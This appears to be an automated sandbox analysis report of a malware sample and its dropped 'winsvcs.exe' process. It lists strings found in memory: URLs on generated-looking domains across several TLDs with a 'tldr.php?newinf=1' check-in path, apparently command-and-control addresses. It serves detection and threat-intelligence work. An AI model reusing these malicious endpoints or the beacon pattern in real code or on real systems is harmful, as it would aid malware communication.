        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://eiifngjfksisiufjf.in/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eiifngjfksisiufjf.in/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eiifngjfksisiufjf.in/tldr.php?newinf=1(i0
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://eiifngjfksisiufjf.info/
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://eiifngjfksisiufjf.net/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eiifngjfksisiufjf.net/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eiifngjfksisiufjf.net/tldr.php?newinf=14A
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://eiifngjfksisiufjf.ru/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eiifngjfksisiufjf.ru/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://eiifngjfksisiufjf.su/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eiifngjfksisiufjf.su/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://eofihsishihiursgu.biz/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eofihsishihiursgu.biz/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://eofihsishihiursgu.com/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eofihsishihiursgu.com/eoroooskfogihisrg.com5
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eofihsishihiursgu.com/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://eofihsishihiursgu.in/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eofihsishihiursgu.in/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://eofihsishihiursgu.info/
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://eofihsishihiursgu.net/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eofihsishihiursgu.net/tldr.php?newinf=1n
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eofihsishihiursgu.net/tldr.php?newinf=1wA
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://eofihsishihiursgu.ru/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eofihsishihiursgu.ru/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eofihsishihiursgu.ru/tldr.php?newinf=1H1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://eofihsishihiursgu.su/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eofihsishihiursgu.su/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://eoroooskfogihisrg.biz/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eoroooskfogihisrg.biz/i
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eoroooskfogihisrg.biz/tldr.php?newinf=1K
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eoroooskfogihisrg.biz/tldr.php?newinf=1T
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://eoroooskfogihisrg.com/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eoroooskfogihisrg.com/tldr.php?newinf=1Uo
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eoroooskfogihisrg.com/tldr.php?newinf=1w
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://eoroooskfogihisrg.in/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eoroooskfogihisrg.in/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eoroooskfogihisrg.in/tldr.php?newinf=15i%
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://eoroooskfogihisrg.info/
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://eoroooskfogihisrg.net/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eoroooskfogihisrg.net/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eoroooskfogihisrg.net/tldr.php?newinf=1YA
